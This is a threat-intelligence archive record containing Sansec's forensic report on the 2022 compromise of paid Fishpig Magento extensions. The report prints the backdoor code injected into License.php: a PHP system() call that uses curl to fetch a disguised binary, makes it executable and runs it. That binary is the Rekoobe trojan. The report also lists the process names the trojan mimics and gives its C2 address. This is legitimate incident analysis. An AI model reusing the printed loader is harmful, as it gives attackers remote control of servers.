{
	"id": "e61ad7aa-5482-40d7-b2d7-582debda5c65",
	"created_at": "2026-04-06T00:17:53.950126Z",
	"updated_at": "2026-04-10T03:24:18.257895Z",
	"deleted_at": null,
	"sha1_hash": "ac2bda66d2e36b4f56151a30cd3ff612979e7bfb",
	"title": "Magento vendor Fishpig hacked, backdoors added",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58488,
	"plain_text": "Magento vendor Fishpig hacked, backdoors added\r\nBy Sansec Forensics Team\r\nArchived: 2026-04-05 13:53:01 UTC\r\nUpdate 2022-09-13 FishPig has confirmed the incident and published a status page. It recommends customers to\r\nupgrade and/or reinstall all FishPig modules.\r\nSansec discovered malware in the Fishpig Magento Security Suite and several other Fishpig extensions for\r\nMagento 2. It is likely that all paid Fishpig extensions have been compromised. Free extensions that are hosted on\r\nGithub seem not to be affected.\r\nThe injected malware will install another piece of malware (\"Rekoobe\") which hides as background process on the\r\nserver.\r\nThe Fishpig distribution server was compromised on or before August 19th. Any Magento store who installed or\r\nupdated paid Fishpig software since then, is now likely running the Rekoobe malware.\r\nFishpig software has over 200,000 downloads. It is not known how many stores use the paid extensions.\r\nNext steps for merchants\r\nFishPig has stated that their repository is fully cleaned. Magento merchants are recommended to:\r\n1. Re-install all FishPig extensions per FishPig instructions\r\n2. Run a server-side malware scanner to detect installed malware \u0026 unauthorized activity. Use coupon\r\nFISHPIG to use our scanner one month for free.\r\n3. Restart the server to terminate any unauthorized background processes\r\nAttack details: lic.bin is Rekoobe\r\nAttackers have added code to License.php , which is normally used to validate a Fishpig license. When a\r\nMagento staff user visits the Fishpig control panel in the Magento backend, the malware downloads a Linux\r\nbinary from license.fishpig.co.uk . The name lic.bin may make it look like a license asset, but it is actually\r\nthe Rekoobe remote access trojan.\r\n$tmp = '/tmp/.varnish7684';\r\nif (file_exists($tmp)) {\r\nhttps://sansec.io/research/rekoobe-fishpig-magento\r\nPage 1 of 3\n\n$fp = fopen($tmp, 'w');\r\n if (!flock($fp, LOCK_EX | LOCK_NB)) {\r\n return $this-\u003eadminDomain;\r\n } else {\r\n fclose($fp);\r\n @system(\"cd ~/;curl https://license.fishpig.co.uk/image/dev/lic.png -o lic.bin;chmod 777 lic.bin;./lic.b\r\n }\r\n} else {\r\n @system(\"cd ~/;curl https://license.fishpig.co.uk/image/dev/lic.png -o lic.bin;chmod 777 lic.bin;./lic.bin '\r\n}\r\nRekoobe uses a configuration file called /tmp/.varnish7684 . After launching, it removes all malware files and\r\nremains in memory. It hides as a system process and mimics one of the following system services:\r\n/usr/sbin/cron -f\r\n/sbin/udevd -d\r\ncrond\r\nauditd\r\n/usr/sbin/rsyslogd\r\n/usr/sbin/atd\r\n/usr/sbin/acpid\r\ndbus-daemon --system\r\n/sbin/init\r\n/usr/sbin/chronyd\r\n/usr/libexec/postfix/master\r\n/usr/lib/packagekit/packagekitd\r\nMeanwhile, it waits for commands from the C2 server located at 46.183.217.223 (Latvia).\r\nSansec has not detected follow-up abuse via the C2 server yet. We expect that access to the affected stores may be\r\nsold in bulk on hacking forums.\r\nAcknowledgements\r\nSansec eComscan has been updated to detect the latest Rekoobe malware varieties.\r\nThanks to our partners Jetrails \u0026 Hypernode for their invaluable help in analyzing this attack!\r\nRead more\r\nMass PolyShell attack wave hits 471 stores in one hour\r\nNovel WebRTC skimmer bypasses security controls at $100+ billion car maker\r\nPolyShell: unrestricted file upload in Magento and Adobe Commerce\r\nDigital skimmer hits global supermarket chain\r\nBuilding a faster YARA engine in pure Go\r\nhttps://sansec.io/research/rekoobe-fishpig-magento\r\nPage 2 of 3\n\nSource: https://sansec.io/research/rekoobe-fishpig-magento\r\nhttps://sansec.io/research/rekoobe-fishpig-magento\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sansec.io/research/rekoobe-fishpig-magento"
	],
	"report_names": [
		"rekoobe-fishpig-magento"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434673,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ac2bda66d2e36b4f56151a30cd3ff612979e7bfb.pdf",
		"text": "https://archive.orkl.eu/ac2bda66d2e36b4f56151a30cd3ff612979e7bfb.txt",
		"img": "https://archive.orkl.eu/ac2bda66d2e36b4f56151a30cd3ff612979e7bfb.jpg"
	}
}